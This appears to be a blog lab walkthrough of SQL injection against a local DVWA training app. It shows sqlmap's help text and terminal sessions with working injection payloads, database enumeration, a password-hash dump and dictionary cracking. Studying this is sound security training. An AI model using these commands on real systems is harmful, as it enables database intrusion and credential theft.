SQL BLIND AND SQL INJECTION DVMA
SQL BLIND AND SQL INJECTION DVMA
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Usage: python ./sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
-l LOGFILE Parse targets from Burp or WebScarab proxy logs
-m BULKFILE Scan multiple targets enlisted in a given textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target urls
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL Encode generated cookie injections
--drop-set-cookie Ignore Set-Cookie header from response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (name:password)
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
--proxy=PROXY Use a HTTP proxy to connect to the target url
--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
--ignore-proxy Ignore system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
--scope=SCOPE Regexp to filter targets from provided proxy log
--safe-url=SAFURL Url address to visit frequently during testing
--safe-freq=SAFREQ Test requests between two visits to a given safe url
Optimization:
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts.
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Detection:
These options can be used to specify how to parse and compare page
content from HTTP responses when using blind SQL injection technique.
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--text-only Compare pages based only on the textual content
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques.
--technique=TECH SQL injection techniques to test for (default BEUST)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use for bruteforcing number of columns
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute force checks.
--common-tables Check existence of common tables
--common-columns Check existence of common columns
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the back-end database management
system underlying file system.
--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
Operating system access:
These options can be used to access the back-end database management
system underlying operating system.
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
These options can be used to access the back-end database management
system Windows registry.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working parameters.
-s SESSIONFILE Save and resume all data retrieved on a session file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--batch Never ask for user input, use the default behaviour
--charset=CHARSET Force character encoding used for data retrieval
--eta Display for each output the estimated time of arrival
--flush-session Flush session file for current target
--fresh-queries Ignores query results stored in session file
--save Save options on a configuration INI file
--update Update sqlmap
Miscellaneous:
--beep Alert when sql injection found
--check-payload IDS detection testing of injection payloads
--cleanup Clean up the DBMS by sqlmap specific UDF and tables
--forms Parse and test forms on target url
--gpage=GOOGLEPAGE Use Google dork results from specified page number
--mobile Imitate smartphone through HTTP User-Agent header
--page-rank Display page rank (PR) for Google dork results
--parse-errors Parse DBMS error messages from response pages
--replicate Replicate dumped data into a sqlite3 database
--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard Simple wizard interface for beginner users
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://localhost/index.php?id=2 --dbs
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:45:28
[01:45:28] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:45:28] [INFO] testing connection to the target url
[01:45:28] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:45:30] [INFO] testing if GET parameter 'id' is dynamic
[01:45:30] [INFO] confirming that GET parameter 'id' is dynamic
[01:45:31] [INFO] GET parameter 'id' is dynamic
[01:45:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:45:31] [INFO] testing sql injection on GET parameter 'id'
[01:45:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:31] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:45:33] [WARNING] GET parameter 'id' is not injectable
[01:45:33] [INFO] testing if GET parameter 'Submit' is dynamic
[01:45:33] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:45:33] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:45:33] [INFO] testing sql injection on GET parameter 'Submit'
[01:45:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:34] [INFO] testing 'Oracle AND time-based blind'
[01:45:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:35] [WARNING] GET parameter 'Submit' is not injectable
[01:45:35] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses
[*] shutting down at: 01:45:35
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:10
[01:46:10] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:10] [INFO] testing connection to the target url
[01:46:10] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:13] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:46:13] [INFO] testing sql injection on GET parameter 'id'
[01:46:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:14] [INFO] testing 'Oracle AND time-based blind'
[01:46:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:46:16] [WARNING] GET parameter 'id' is not injectable
[01:46:16] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:16] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:16] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:16] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:17] [INFO] testing 'Oracle AND time-based blind'
[01:46:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:18] [WARNING] GET parameter 'Submit' is not injectable
[01:46:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses
[*] shutting down at: 01:46:18
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:31
[01:46:31] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:31] [INFO] testing connection to the target url
[01:46:31] [INFO] testing if the provided string is within the target URL page content
[01:46:31] [INFO] testing if GET parameter 'id' is dynamic
[01:46:31] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:31] [INFO] GET parameter 'id' is dynamic
[01:46:32] [INFO] heuristics detected web page charset 'ascii'
[01:46:32] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[01:46:32] [INFO] testing sql injection on GET parameter 'id'
[01:46:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:42] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:46:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:42] [INFO] target url appears to be UNION injectable with 2 columns
[01:46:42] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[01:46:45] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:45] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:45] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:45] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:49] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9643=9643 AND 'KTii'='KTii&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'nCjY'='nCjY&Submit=Submit
---
[01:46:49] [INFO] manual usage of GET payloads requires url encoding
[01:46:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:49] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:46:50
Scan DataBase in folder DVWA
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:50
[01:46:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:50] [INFO] resuming injection data from session file
[01:46:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:50] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:50] [INFO] manual usage of GET payloads requires url encoding
[01:46:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:50] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 00:42:45
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:51
[01:46:51] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:51] [INFO] resuming injection data from session file
[01:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:44:35] [INFO] manual usage of GET payloads requires url encoding
[00:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:46:53
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users -C password --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:53
[01:46:53 [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:53] [INFO] resuming injection data from session file
[01:46:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:53] [INFO] manual usage of GET payloads requires url encoding
[01:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[01:46:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[01:46:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[01:46:55] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:46:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[01:46:58] [INFO] starting dictionary attack (md5_generic_passwd)
[01:46:58] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[01:46:58] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[01:46:58] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[01:46:58] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+
[01:46:58] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[01:46:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
Comments
Post a Comment